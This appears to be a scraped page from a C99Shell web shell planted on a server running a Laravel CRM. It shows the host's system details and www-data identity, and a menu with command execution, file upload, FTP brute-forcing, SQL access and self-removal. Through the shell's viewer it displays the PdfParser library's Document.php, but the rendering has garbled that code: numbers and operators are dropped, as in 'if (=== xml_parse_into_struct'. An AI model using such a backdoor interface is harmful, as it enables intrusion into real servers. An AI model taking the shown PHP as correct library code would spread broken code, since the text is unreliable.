!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/smalot/pdfparser/src/Smalot/PdfParser/   drwxrwxrwx
Free 12.95 GB of 57.97 GB (22.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Document.php (15.15 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * @file
 *          This file is part of the PdfParser library.
 *
 * @author  Sébastien MALOT <sebastien@malot.fr>
 *
 * @date    2017-01-03
 *
 * @license LGPLv3
 *
 * @url     <https://github.com/smalot/pdfparser>
 *
 *  PdfParser is a pdf library written in PHP, extraction oriented.
 *  Copyright (C) 2017 - Sébastien MALOT <sebastien@malot.fr>
 *
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU Lesser General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Lesser General Public License for more details.
 *
 *  You should have received a copy of the GNU Lesser General Public License
 *  along with this program.
 *  If not, see <http://www.pdfparser.org/sites/default/LICENSE.txt>.
 */

namespace Smalot\PdfParser;

use 
Smalot\PdfParser\Encoding\PDFDocEncoding;
use 
Smalot\PdfParser\Exception\MissingCatalogException;

/**
 * Technical references :
 * - http://www.mactech.com/articles/mactech/Vol.15/15.09/PDFIntro/index.html
 * - http://framework.zend.com/issues/secure/attachment/12512/Pdf.php
 * - http://www.php.net/manual/en/ref.pdf.php#74211
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/ISOLatin1Encoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/ISOLatin9Encoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/StandardEncoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/WinAnsiEncoding.pm
 *
 * Class Document
 */
class Document
{
    
/**
     * @var PDFObject[]
     */
    
protected $objects = [];

    
/**
     * @var array
     */
    
protected $dictionary = [];

    
/**
     * @var Header
     */
    
protected $trailer;

    
/**
     * @var array<mixed>
     */
    
protected $metadata = [];

    
/**
     * @var array
     */
    
protected $details;

    public function 
__construct()
    {
        
$this->trailer = new Header([], $this);
    }

    public function 
init()
    {
        
$this->buildDictionary();

        
$this->buildDetails();

        
// Propagate init to objects.
        
foreach ($this->objects as $object) {
            
$object->getHeader()->init();
            
$object->init();
        }
    }

    
/**
     * Build dictionary based on type header field.
     */
    
protected function buildDictionary()
    {
        
// Build dictionary.
        
$this->dictionary = [];

        foreach (
$this->objects as $id => $object) {
            
// Cache objects by type and subtype
            
$type $object->getHeader()->get('Type')->getContent();

            if (
null != $type) {
                if (!isset(
$this->dictionary[$type])) {
                    
$this->dictionary[$type] = [
                        
'all' => [],
                        
'subtype' => [],
                    ];
                }

                
$this->dictionary[$type]['all'][$id] = $object;

                
$subtype $object->getHeader()->get('Subtype')->getContent();
                if (
null != $subtype) {
                    if (!isset(
$this->dictionary[$type]['subtype'][$subtype])) {
                        
$this->dictionary[$type]['subtype'][$subtype] = [];
                    }
                    
$this->dictionary[$type]['subtype'][$subtype][$id] = $object;
                }
            }
        }
    }

    
/**
     * Build details array.
     */
    
protected function buildDetails()
    {
        
// Build details array.
        
$details = [];

        
// Extract document info
        
if ($this->trailer->has('Info')) {
            
/** @var PDFObject $info */
            
$info $this->trailer->get('Info');
            
// This could be an ElementMissing object, so we need to check for
            // the getHeader method first.
            
if (null !== $info && method_exists($info'getHeader')) {
                
$details $info->getHeader()->getDetails();
            }
        }

        
// Retrieve the page count
        
try {
            
$pages $this->getPages();
            
$details['Pages'] = \count($pages);
        } catch (
\Exception $e) {
            
$details['Pages'] = 0;
        }

        
// Decode and repair encoded document properties
        
foreach ($details as $key => $value) {
            if (
\is_string($value)) {
                
// If the string is already UTF-8 encoded, that means we only
                // need to repair Adobe's ham-fisted insertion of line-feeds
                // every ~127 characters, which doesn't seem to be multi-byte
                // safe
                
if (mb_check_encoding($value'UTF-8')) {
                    
// Remove literal backslash + line-feed "\\r"
                    
$value str_replace("\x5c\x0d"''$value);

                    
// Remove backslash plus bytes written into high part of
                    // multibyte unicode character
                    
while (preg_match("/\x5c\x5c\xe0([\xb4-\xb8])(.)/"$value$match)) {
                        
$diff = (\ord($match[1]) - 182) * 64;
                        
$newbyte PDFDocEncoding::convertPDFDoc2UTF8(\chr(\ord($match[2]) + $diff));
                        
$value preg_replace("/\x5c\x5c\xe0".$match[1].$match[2].'/'$newbyte$value);
                    }

                    
// Remove bytes written into low part of multibyte unicode
                    // character
                    
while (preg_match("/(.)\x9c\xe0([\xb3-\xb7])/"$value$match)) {
                        
$diff \ord($match[2]) - 181;
                        
$newbyte \chr(\ord($match[1]) + $diff);
                        
$value preg_replace('/'.$match[1]."\x9c\xe0".$match[2].'/'$newbyte$value);
                    }

                    
// Remove this byte string that Adobe occasionally adds
                    // between two single byte characters in a unicode string
                    
$value str_replace("\xe5\xb0\x8d"''$value);

                    
$details[$key] = $value;
                } else {
                    
// If the string is just PDFDocEncoding, remove any line-feeds
                    // and decode the whole thing.
                    
$value str_replace("\\\r"''$value);
                    
$details[$key] = PDFDocEncoding::convertPDFDoc2UTF8($value);
                }
            }
        }

        
$details array_merge($details$this->metadata);

        
$this->details $details;
    }

    
/**
     * Extract XMP Metadata
     */
    
public function extractXMPMetadata(string $content): void
    
{
        
$xml xml_parser_create();
        
xml_parser_set_option($xml\XML_OPTION_SKIP_WHITE1);

        if (
=== xml_parse_into_struct($xml$content$values$index)) {
            
/*
             * short overview about the following code parts:
             *
             * The output of xml_parse_into_struct is a single dimensional array (= $values), and the $stack is a last-on,
             * first-off array of pointers to positions in $metadata, while iterating through it, that potentially turn the
             * results into a more intuitive multi-dimensional array. When an "open" XML tag is encountered,
             * we save the current $metadata context in the $stack, then create a child array of $metadata and
             * make that the current $metadata context. When a "close" XML tag is encountered, the operations are
             * reversed: the most recently added $metadata context from $stack (IOW, the parent of the current
             * element) is set as the current $metadata context.
             */
            
$metadata = [];
            
$stack = [];
            foreach (
$values as $val) {
                
// Standardize to lowercase
                
$val['tag'] = strtolower($val['tag']);

                
// Ignore structural x: and rdf: XML elements
                
if (=== strpos($val['tag'], 'x:')) {
                    continue;
                } elseif (
=== strpos($val['tag'], 'rdf:') && 'rdf:li' != $val['tag']) {
                    continue;
                }

                switch (
$val['type']) {
                    case 
'open':
                        
// Create an array of list items
                        
if ('rdf:li' == $val['tag']) {
                            
$metadata[] = [];

                            
// Move up one level in the stack
                            
$stack[\count($stack)] = &$metadata;
                            
$metadata = &$metadata[\count($metadata) - 1];
                        } else {
                            
// Else create an array of named values
                            
$metadata[$val['tag']] = [];

                            
// Move up one level in the stack
                            
$stack[\count($stack)] = &$metadata;
                            
$metadata = &$metadata[$val['tag']];
                        }
                        break;

                    case 
'complete':
                        if (isset(
$val['value'])) {
                            
// Assign a value to this list item
                            
if ('rdf:li' == $val['tag']) {
                                
$metadata[] = $val['value'];

                                
// Else assign a value to this property
                            
} else {
                                
$metadata[$val['tag']] = $val['value'];
                            }
                        }
                        break;

                    case 
'close':
                        
// If the value of this property is an array
                        
if (\is_array($metadata)) {
                            
// If the value is a single element array
                            // where the element is of type string, use
                            // the value of the first list item as the
                            // value for this property
                            
if (== \count($metadata) && isset($metadata[0]) && \is_string($metadata[0])) {
                                
$metadata $metadata[0];
                            } elseif (
== \count($metadata)) {
                                
// if the value is an empty array, set
                                // the value of this property to the empty
                                // string
                                
$metadata '';
                            }
                        }

                        
// Move down one level in the stack
                        
$metadata = &$stack[\count($stack) - 1];
                        unset(
$stack[\count($stack) - 1]);
                        break;
                }
            }

            
// Only use this metadata if it's referring to a PDF
            
if (!isset($metadata['dc:format']) || 'application/pdf' == $metadata['dc:format']) {
                
// According to the XMP specifications: 'Conflict resolution
                // for separate packets that describe the same resource is
                // beyond the scope of this document.' - Section 6.1
                // Source: https://www.adobe.com/devnet/xmp.html
                // Source: https://github.com/adobe/XMP-Toolkit-SDK/blob/main/docs/XMPSpecificationPart1.pdf
                // So if there are multiple XMP blocks, just merge the values
                // of each found block over top of the existing values
                
$this->metadata array_merge($this->metadata$metadata);
            }
        }
        
xml_parser_free($xml);
    }

    public function 
getDictionary(): array
    {
        return 
$this->dictionary;
    }

    
/**
     * @param PDFObject[] $objects
     */
    
public function setObjects($objects = [])
    {
        
$this->objects = (array) $objects;

        
$this->init();
    }

    
/**
     * @return PDFObject[]
     */
    
public function getObjects()
    {
        return 
$this->objects;
    }

    
/**
     * @return PDFObject|Font|Page|Element|null
     */
    
public function getObjectById(string $id)
    {
        if (isset(
$this->objects[$id])) {
            return 
$this->objects[$id];
        }

        return 
null;
    }

    public function 
hasObjectsByType(string $type, ?string $subtype null): bool
    
{
        return 
\count($this->getObjectsByType($type$subtype));
    }

    public function 
getObjectsByType(string $type, ?string $subtype null): array
    {
        if (!isset(
$this->dictionary[$type])) {
            return [];
        }

        if (
null != $subtype) {
            if (!isset(
$this->dictionary[$type]['subtype'][$subtype])) {
                return [];
            }

            return 
$this->dictionary[$type]['subtype'][$subtype];
        }

        return 
$this->dictionary[$type]['all'];
    }

    
/**
     * @return Font[]
     */
    
public function getFonts()
    {
        return 
$this->getObjectsByType('Font');
    }

    public function 
getFirstFont(): ?Font
    
{
        
$fonts $this->getFonts();
        if ([] === 
$fonts) {
            return 
null;
        }

        return 
reset($fonts);
    }

    
/**
     * @return Page[]
     *
     * @throws MissingCatalogException
     */
    
public function getPages()
    {
        if (
$this->hasObjectsByType('Catalog')) {
            
// Search for catalog to list pages.
            
$catalogues $this->getObjectsByType('Catalog');
            
$catalogue reset($catalogues);

            
/** @var Pages $object */
            
$object $catalogue->get('Pages');
            if (
method_exists($object'getPages')) {
                return 
$object->getPages(true);
            }
        }

        if (
$this->hasObjectsByType('Pages')) {
            
// Search for pages to list kids.
            
$pages = [];

            
/** @var Pages[] $objects */
            
$objects $this->getObjectsByType('Pages');
            foreach (
$objects as $object) {
                
$pages array_merge($pages$object->getPages(true));
            }

            return 
$pages;
        }

        if (
$this->hasObjectsByType('Page')) {
            
// Search for 'page' (unordered pages).
            
$pages $this->getObjectsByType('Page');

            return 
array_values($pages);
        }

        throw new 
MissingCatalogException('Missing catalog.');
    }

    public function 
getText(?int $pageLimit null): string
    
{
        
$texts = [];
        
$pages $this->getPages();

        
// Only use the first X number of pages if $pageLimit is set and numeric.
        
if (\is_int($pageLimit) && $pageLimit) {
            
$pages \array_slice($pages0$pageLimit);
        }

        foreach (
$pages as $index => $page) {
            
/**
             * In some cases, the $page variable may be null.
             */
            
if (null === $page) {
                continue;
            }
            if (
$text trim($page->getText())) {
                
$texts[] = $text;
            }
        }

        return 
implode("\n\n"$texts);
    }

    public function 
getTrailer(): Header
    
{
        return 
$this->trailer;
    }

    public function 
setTrailer(Header $trailer)
    {
        
$this->trailer $trailer;
    }

    public function 
getDetails(): array
    {
        return 
$this->details;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0071 ]--